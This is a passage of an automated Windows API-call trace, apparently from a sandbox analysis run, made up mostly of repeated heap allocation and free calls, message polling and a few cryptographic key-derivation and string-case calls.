Flags=0x0, Size=0x10) returned 0x34aa670 [0161.173] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa55e0) returned 1 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.175] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.175] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.176] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.176] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.176] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.176] CryptDestroyHash (hHash=0xaa5660) returned 1 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.179] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.185] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.186] HeapFree (in: 